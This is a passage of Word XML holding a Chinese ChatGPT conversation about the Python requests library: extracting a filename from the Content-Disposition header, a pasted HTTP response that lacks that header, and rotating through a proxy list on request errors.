    <w:p w14:paraId="3ED29419" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你应该先检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Content-Disposition' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否在响应头中，只有在存在时才尝试访问它，可以使用以下代码进行修改：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F886324" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5030AD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568131A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B16D0B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B0F300" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>res = requests.get('url')  # Replace 'url' with your actual URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1066FCBA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if 'Content-Disposition' in res.headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA281C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    content_disposition = res.headers['Content-Disposition']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1B161" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    filename = content_disposition.split('filename=')[1].strip('"')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295ED611" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print(filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36471F85" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619106E2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Content-Disposition header does not exist.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C1F694" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131D4384" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码首先检查响应头中是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Content-Disposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果存在，那么就像之前一样提取文件名。如果不存在，那么就打印一个消息通知用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3D7D2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B8E52" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/2 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533FC35E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036D659" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Fri, 26 May 2023 02:40:14 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9EF12" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/plain; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E55E1A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Length: 1628</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558001C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>X-Sucuri-Id: 14013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0904F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Strict-Transport-Security: max-age=63072000; includeSubdomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51106CEB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Cache-Control: no-cache, private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F5081" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Vary: Accept-Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78305C98" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D3D9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E117664" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>X-Xss-Protection: 1; mode=block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7C9BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRCR1h1enFYaEhzY0NOV2tWNGs4V2c9PSIsInZhbHVlIjoiNHRTeVwvTzdFZ3g1RVZSbmF4T2V3bU1aZDhLXC96VGVFTlRGTzdkaUJrNWVrdk4zaUJDbTdDT0l6U09XZjNEcGhEIiwibWFjIjoiNTJiZjM3ZmU3YmY1ZGU2MGVjMmVhM2MwNjI5NGQ3ZjE4MDgxNjc4Njk3MTQ4YTk3YWM4ODYzYWQ2MDlkOGQ4NSJ9; expires=Fri, 26-May-2023 04:40:11 GMT; Max-Age=7200; path=/; secure;HttpOnly;Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03038220" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Set-Cookie: exploit_database_session=eyJpdiI6ImZQTEpqSFRDQ0JucVwvbXdVa05kZFV3PT0iLCJ2YWx1ZSI6IjhNZHNidXo4SkNhYnhJWjFnb0E1OVgzZFdtU2hLZExcL3hnM2xXQXpqNG1sUWlIa3MzaDBmOGlBdFpjK1ZPXC9LKyIsIm1hYyI6ImViOWI2MmFhM2UxOGE1YmMwYmQwZTA2ZmQxYjUxMDY3M2I5OTNjNjE2NjFkYjU3MWM2OTQxMWQ1ZmVjNmYyOTcifQ%3D%3D; expires=Fri, 26-May-2023 04:40:11 GMT; Max-Age=7200; path=/; secure; httponly;HttpOnly;Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3C218" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Referrer-Policy: same-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59DC99" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X-Sucuri-Cache: HIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从这里面给我匹配出文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70CE2B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A239BD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378DD3B7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头数据中，我注意到并没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'Content-Disposition'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段。这个字段通常用来提供文件名。因此，我们无法从这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头中提取文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFD4F7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F99FE7E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你确信文件名存在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头中，但不在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'Content-Disposition'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段，你需要知道确切的字段名称才能提取文件名。如果你不清楚文件名存在于哪个字段，可能需要进一步的研究或询问提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应的服务提供者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4FDCB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D491C4E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持不支持代理链？比如我有多个支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理的节点，我想让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己发现网络错误的时候，自行更换节点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFA1B8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107BF154" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE5E30D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库本身并不支持代理链。当你为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置代理时，所有的请求都将通过这个代理进行。如果你希望在出现网络错误时更换代理，你需要自行在代码中实现这个逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77446B1F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CE78C7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体来说，你可以创建一个列表或者其他数据结构来保存所有的代理服务器。然后，当你发送请求时，使用其中一个代理。如果请求失败（例如，抛出异常或者返回的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码表示错误），则在你的代码中捕获这个错误，并从你的代理列表中选择另一个代理，然后再次发送请求。这个过程可以在一个循环中进行，直到请求成功或者你已经尝试了所有的代理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC2F28" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA9C23C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是一个简单的示例，这个代码会在请求失败时更换代理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D542F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E3677D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C060D23" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F32D2AE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from requests.exceptions import RequestException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC92451" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E831FB9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理列表，你可以替换成你自己的代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3764F66A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>proxies_list = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E243D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {'http': 'http://proxy1.com:8080'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD108EF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {'http': 'http://proxy2.com:8080'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D508B52" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更多代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FDA21C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40AD10" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423C350D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>url = "http://example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACBFF7A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F14B74D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for proxy in proxies_list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8BF7D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4867194B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = requests.get(url, proxies=proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364227E4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response.raise_for_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230120E9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果请求成功，处理响应然后跳出循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D583E44" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        handle_response(response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59BCAD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A809FF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    except RequestException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67944A9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果请求失败，循环将继续并使用下一个代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF2DBF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8AC184" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2EC996" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这个示例假设每个代理都支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果你的代理支持其他协议，你可能需要调整代理字典的格式。还要注意，如果所有的代理都无法访问目标网站，这个代码会尝试所有的代理然后退出循环。你可能需要添加更多的错误处理代码来处理这种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F830CB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174C984" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests.session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象作为参数传参的时候，传递的是自身的引用，还是自身的值的拷贝？</w:t>
      </w:r>
    </w:p>
